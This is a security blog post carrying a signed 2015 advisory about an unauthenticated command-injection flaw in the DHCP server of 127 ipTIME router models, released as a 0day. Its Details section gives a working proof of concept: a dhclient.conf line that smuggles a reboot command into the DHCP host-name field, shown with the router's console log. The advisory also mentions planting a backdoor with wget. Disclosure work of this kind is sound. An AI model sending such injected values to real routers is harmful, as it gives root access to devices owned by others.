A slice of Kimchi - IT Security Blog

HomeAboutFeed

127 ipTIME router models vulnerable to an unauthenticated RCE by sending a crafted DHCP request

-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA512


## Advisory Information

Title: 127 ipTIME router models vulnerable to an unauthenticated RCE by sending a crafted DHCP request
Advisory URL: https://pierrekim.github.io/advisories/2015-iptime-0x02.txt
Blog URL: https://pierrekim.github.io/blog/2015-07-06-127-iptime-router-models-unauthenticated-RCE-with-DHCP.html
Date published: 2015-07-06
Vendors contacted: None
Release mode: Released, 0day
CVE: no current CVE



## Product Description

EFMNetworks ipTIME is the largest Korean brand of SOHO/small/middle entreprise Routers/WiFi APs/Modems/Firewalls in South Korea
with millions of devices deployed in the country. EFMNetworks ipTIME is occupying more than 60 percent of personal network devices.
There are =~ 10 000 000 of ipTIME devices deployed in South Korea.



## Vulnerability Summary

This vulnerability allows to bypass the admin authentication and to get a direct RCE from the LAN side with a single DHCP request.

This is a direct RCE against the routers which gives a complete root access to the embedded Linux from the LAN side.

It affects 127 ipTIME products from 2009-era firmwares to the current firwmare (9.66, built time 2015-06-11) with the default configuration:


- ipTIME a1004
- ipTIME a1004v
- ipTIME a104
- ipTIME a104ns
- ipTIME a104r
- ipTIME a2004
- ipTIME a2004ns
- ipTIME a2004r
- ipTIME a2008
- ipTIME a3004
- ipTIME a3004ns
- ipTIME a5004ns
- ipTIME a604
- ipTIME a604v
- ipTIME extac
- ipTIME extd2
- ipTIME g1
- ipTIME g104
- ipTIME g104a
- ipTIME g104be
- ipTIME g104i
- ipTIME g104m
- ipTIME g204
- ipTIME g501
- ipTIME g504
- ipTIME ipsmart
- ipTIME mini
- ipTIME mobap1
- ipTIME multi
- ipTIME n1
- ipTIME n104
- ipTIME n104a
- ipTIME n104ar1
- ipTIME n104i
- ipTIME n104k
- ipTIME n104ktt
- ipTIME n104m
- ipTIME n104p
- ipTIME n104q
- ipTIME n104r
- ipTIME n104r3
- ipTIME n104rsk
- ipTIME n104s
- ipTIME n104sr1
- ipTIME n104t
- ipTIME n104v
- ipTIME n104vlg
- ipTIME n1e
- ipTIME n1eky
- ipTIME n1p
- ipTIME n2
- ipTIME n2e
- ipTIME n2p
- ipTIME n3004
- ipTIME n5
- ipTIME n5004
- ipTIME n504
- ipTIME n5r1
- ipTIME n6004
- ipTIME n6004m
- ipTIME n6004r
- ipTIME n604
- ipTIME n604a
- ipTIME n604i
- ipTIME n604m
- ipTIME n604p
- ipTIME n604r
- ipTIME n604s
- ipTIME n604t
- ipTIME n604v
- ipTIME n604vlg
- ipTIME n608
- ipTIME n7004ns
- ipTIME n702bcm
- ipTIME n704
- ipTIME n704a
- ipTIME n704a3
- ipTIME n704bcm
- ipTIME n704lg
- ipTIME n704m
- ipTIME n704mlg
- ipTIME n704ns
- ipTIME n704s
- ipTIME n704v
- ipTIME n704v3
- ipTIME n8004
- ipTIME n8004r
- ipTIME n8004v
- ipTIME n804
- ipTIME n804a
- ipTIME n804a3
- ipTIME n804t
- ipTIME n804t3
- ipTIME n804v
- ipTIME n904
- ipTIME n904ns
- ipTIME n904v
- ipTIME ng104
- ipTIME ng304
- ipTIME ntq104
- ipTIME ntv108
- ipTIME ntv116
- ipTIME ntv124
- ipTIME q1
- ipTIME q304
- ipTIME q504
- ipTIME q604
- ipTIME t1004
- ipTIME t1008
- ipTIME t16000
- ipTIME t2008
- ipTIME t24000
- ipTIME t3004
- ipTIME t3008
- ipTIME timeve
- ipTIME tq204
- ipTIME tv104
- ipTIME v1016
- ipTIME v1024
- ipTIME v304
- ipTIME v308
- ipTIME v504
- ipTIME wre1
- ipTIME x3003
- ipTIME x3007
- ipTIME x5007
- ipTIME x6003


The probability that firmware 9.68 (last firmware for these specific models) running in the below products is vulnerable is VERY high:


- ipTIME q304
- ipTIME q1
- ipTIME q504
- ipTIME ew302
- ipTIME n702bcm
- ipTIME a3004ns
- ipTIME a5004ns


Concerning the high CVSS score (10/10) of the vulnerability, the number of affected devices and the longevity of this vulnerability (6+ year old),
the ipTIME users are urged to contact ipTIME.



## Details

This vulnerability is the exact inverse of CVE-2011-0997. The DHCPD server in ipTIME devices allows remote attackers to execute arbitrary commands
via shell metacharacters in the host-name field.

Sending a DHCP request with this parameter will reboot the device:

cat /etc/dhcp/dhclient.conf

send host-name ";/sbin/reboot";

When connecting to the UART port (`screen /dev/ttyUSB0 38400`), we will see the stdout of the /dev/console device;
the dhcp request will immediately force the reboot of the remote device:


Booting...

@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@
@
@ chip__no chip__id mfr___id dev___id cap___id size_sft dev_size chipSize
@ 0000000h 0c84015h 00000c8h 0000040h 0000015h 0000000h 0000015h 0200000h
@ blk_size blk__cnt sec_size sec__cnt pageSize page_cnt chip_clk chipName
@ 0010000h 0000020h 0001000h 0000200h 0000100h 0000010h 000004eh GD25Q16
@
@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@

[...]
WiFi Simple Config v1.12 (2009.07.31-11:35+0000).

Launch iwcontrol: wlan0
Reaped 317
iwcontrol RUN OK
SIGNAL -> Config Update signal progress
killall: pppoe-relay: no process killed
SIGNAL -> WAN ip changed
WAN0 IP: 192.168.2.1
signalling START
Invalid upnpd exit
killall: upnpd: no process killed
upnpd Restart 1
iptables: Bad rule (does a matching rule exist in that chain?)
Session Garbage Collecting:Maybe system time is updated.( 946684825 0 )
Update Session timestamp and try it after 5 seconds again.
ez_ipupdate callback --> time_elapsed: 0
Run DDNS by IP change:  / 192.168.2.1
Reaped 352
iptables: Bad rule (does a matching rule exist in that chain?)
Jan  1 00:00:25 miniupnpd[370]: Reloading rules from lease file
Jan  1 00:00:25 miniupnpd[370]: could not open lease file: /var/run/upnp_pmlist
Jan  1 00:00:25 miniupnpd[370]: HTTP listening on port 2048
Reaped 363
Led Silent Callback
Turn ON All LED
Dynamic Channel Search for wlan0 is OFF
start_signal => plantynet_sync
Do start_signal => plantynet_sync
SIGNAL -> Config Update signal progress
killall: pppoe-relay: no process killed
SIGNAL -> WAN ip changed
Reaped 354
iptables: Bad rule (does a matching rule exist in that chain?)
ez_ipupdate callback --> time_elapsed: 1
Run DDNS by IP change:  / 192.168.2.1
Burst DDNS Registration is denied: iptime -> now:26
Led Silent Callback
Turn ON All LED
/proc/sys/net/ipv4/tcp_syn_retries: cannot create
- ---> Plantynet Event : 00000003
- ---> PLANTYNET_SYNC_INTERNET_BLOCK_DEVICE


[sending the DHCP request]


[01/Jan/2000:00:01:03 +0000] [01/Jan/2000:00:01:03 +0000] Jan  1 00:01:03 miniupnpd[370]: received signal 15, good-bye
Reaped 392
Reaped 318
Reaped 314
Reaped 290
Reaped 288
Reaped 268
Reaped 370
Reaped 367
- ---> PLANTYNET_SYNC_FREE_DEVICE
Restarting system.

Booting...

@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@
@
@ chip__no chip__id mfr___id dev___id cap___id size_sft dev_size chipSize
@ 0000000h 0c84015h 00000c8h 0000040h 0000015h 0000000h 0000015h 0200000h
@ blk_size blk__cnt sec_size sec__cnt pageSize page_cnt chip_clk chipName
@ 0010000h 0000020h 0001000h 0000200h 0000100h 0000010h 000004eh GD25Q16
@
@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@
Reboot Result from Watchdog Timeout!

- ---RealTek(RTL8196E)at 2012.07.06-04:36+0900 v0.4 [16bit](400MHz)
Delay 1 second till reset button
Magic Number: raw_nv 00000000
Check Firmware(05020000) : size: 0x001ddfc8 ---->


[...]




An attacker can use the /usr/bin/wget binary located in the file system of the remote device to plant a backdoor and then execute it as root.

- From my tests, it is possible to use this vulnerability to overwrite the firmware with a custom (backdoored) firmware.



## Vendor Response

- From my experience, contacting EFMNetworks ipTIME proved to be useless.
They don't publish security information in the changelog, they don't answer to security researchers and
they don't credit them either.
EFMNetworks ipTIME was not contacted in regard of this case.



## Report Timeline

* Jun 02, 2014: Vulnerability found by Pierre Kim.
* Apr 07, 2015: Vulnerabilities confirmed with reliable PoCs.
* Jun 25, 2015: Vulnerability confirmed on all the existing versions from 2009 to 2015 including the last firmware version (9.66).
* Jul 06, 2015: A public advisory is sent to security mailing lists.



## Credit

This vulnerability was found by Pierre Kim (@PierreKimSec).



## References

https://pierrekim.github.io/advisories/2015-iptime-0x02.txt



## Disclaimer

This advisory is licensed under a Creative Commons Attribution Non-Commercial
Share-Alike 3.0 License: http://creativecommons.org/licenses/by-nc-sa/3.0/



-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1

iQIcBAEBCgAGBQJVmcxDAAoJEMQ+Dtp9ky28/vgP/RexWVHpSEIxER8l/JbShcuC
mUKpgvxFzLNqFbqXRrf1obB7DhJ2H1q1e1Nq/w02QZDBnhN3A6e52cBFNw7SLQ9V
zuoNX3o/we9LkPN1rQsQniPiPp3GqtzgE8+mXzyWSgGBrk+9xa3Wymn3Z1VlZjUy
L+gmfYIgyv7RRnAOqZn8k2eJOFdrytp4I7RlGP9eBUas8M+Sd0Y9cFmF9OsaAJtC
SrerzyAt1onlNpeiMGWqI6hyqK/Fh2JSDzeYrYMZVjUgR/ffaLS+7WQSjByunCR5
XlpsgxGKqpqrpOd6IVdE9YMKS2/zi9oiEd3fRIxNHGZ+yjGHThK562lhLgm+aeMf
nRDMJaby4qvhztChktT8z0ie0C/3xW6I1K2VlEi+89Z5N6951TsZcFgUq65mLi7l
x0s3Q9BblZ21+W5nD3dJlK+F+NX6s0+MzAv44r4lAP4nuJ5k0zHw7LIHQ09boZX2
+4zJa1vZjFgsVCC0QgVdbpR3pPn9MSwsPiMOcqwZZALrJpQRljNm7+A/fKO9kDUx
z7MZVnoY2090EpspCrE3wA6AGYdrzVg3tc9U90hc+kdMRTR0cOpK5TDf9ArN6Bok
kTPhnpOftrEVYOA1JLeOvSPNFLYK193niQE46TrTlQMUVKsummhtTJY8oe+rtQMf
WHjFp48VR2JM+PMRW0BR
=c35o
-----END PGP SIGNATURE-----

More vulnerabilities regarding ipTIME products are likely to be released soon.

published on 2015-07-06 00:00:00 by Pierre Kim <pierre.kim.sec@gmail.com>